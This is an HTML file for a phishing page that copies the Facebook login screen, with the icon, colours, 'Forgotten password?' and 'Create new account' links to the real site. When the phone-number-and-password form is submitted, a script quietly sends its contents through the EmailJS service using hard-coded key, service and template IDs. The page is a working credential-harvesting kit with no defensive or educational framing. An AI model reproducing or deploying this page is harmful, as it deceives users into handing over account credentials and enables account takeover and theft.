<!DOCTYPE html>
<html>
<head>
    <title>Facebook-Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">

    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
    <script type="text/javascript">
        (function() {
            // https://dashboard.emailjs.com/admin/account
            emailjs.init({
              publicKey: "5WIueTHzbBJS_kB6N",
            });
        })();
    </script>
    <script type="text/javascript">
        window.onload = function() {
            document.getElementById('myForm').addEventListener('submit', function(event) {
                event.preventDefault();
                // these IDs from the previous steps
                emailjs.sendForm('service_jqahwy9', 'template_6vshnf7', this)
                    .then(() => {
                        console.log('SUCCESS!');
                    }, (error) => {
                        console.log('FAILED...', error);
                    });
            });
        }

   document.addEventListener("DOMContentLoaded", function() {
  const form = document.getElementById("myForm"); // replace "myForm" with your form's ID
});
    </script>

<style>
  body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    margin: 0;
    padding: 0;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
  }

  /* For larger screens */
@media only screen and (min-width: 600px) {
  .container {
    background-color: #fff;
    padding: 20px;
    width: 350px;
    border-radius: 8px;
    box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.1);
  }
}

/* For smaller screens */
@media only screen and (max-width: 599px) {
  .container {
    width: 80%; /* Occupy full width of the screen */
    padding: 20px; /* Add some padding for better readability */
    background-color: #fff;
    border-radius: 8px;
    box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.1);
  }
}


  .form-group {
    margin-bottom: 20px;
  }

  .form-group label {
    display: block;
    font-weight: bold;
    margin-bottom: 5px;
  }

  .form-group input {
    width: 95%;
    height: 30px;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
    font-size: 16px;
  }

  .form-group .submit {
    font-family: Arial, Helvetica, sans-serif;
    width: 100%;
    padding: 10px;
    font-weight: bold;
    border: none;
    border-radius: 4px;
    background-color: #0866FF;
    color: #fff;
    font-size: 20px;
    cursor: pointer;
    height: 50px;
  }

  .forgotten-password {
    font-size: 14px;
    font-family: Arial, Helvetica, sans-serif;
    text-align: center;
  }

  .buttom-line {
    align-items: center;
    border-bottom: 1px solid #dadde1;
    display: flex;
    margin: 20px 16px;
    text-align: center;
}

.create-account-btn {
    font-family: Arial, Helvetica, sans-serif;
    background: #42B72A;
    font-size: 17px;
    font-style: bold;
    padding-top: 13px;
    color: white;
    font-weight: bold;
    padding-bottom: 13px;
    padding-left: 20px;
    padding-right: 20px;
    margin-left: 20%;
    margin-right: 20%;
    border: none;
    border-radius: 6px;
    cursor: pointer;
}

.create-page {
    text-decoration: none;
}

h2 {
  font-weight: 700;
  font-size: 40px;
  text-align: center;
}

.facebook-icon {
  font-size: 58px;
  color: #0866FF;
  text-align: center;
  margin-bottom: 5px;
}

/* Optional: Add hover effect */
.facebook-icon:hover {
  opacity: 0.8;
  cursor: pointer;
}

</style>
</head>
<body>
  

  <div class="container">
    <div class="facebook-icon">
      <i class="bi bi-facebook"></i>
    </div>
    <h2>Login</h2>
    <form id="myForm">
        <div class="form-group">
            <input type="tel" id="phone" name="phone" placeholder="Phone number" >
        </div>
        <div class="form-group">
            <input type="password" id="password" name="password" placeholder="Password" >
        </div>
        <div class="form-group">
            <input class="submit" type="submit" value="Login">
        </div>
        <p class="forgotten-password"><a href="https://www.facebook.com/login/identify
          ">Forgotten password?</a></p>

        <div class="buttom-line"></div>

        <a href="https://www.facebook.com/r.php"><button class="create-account-btn" type="button">Create new account</button></a>
    </form>

    <p class="create-page"><a href="https://www.facebook.com/pages/create">Create page</a> for celebrity, brand or business</p>
</div>
</body>
</html>
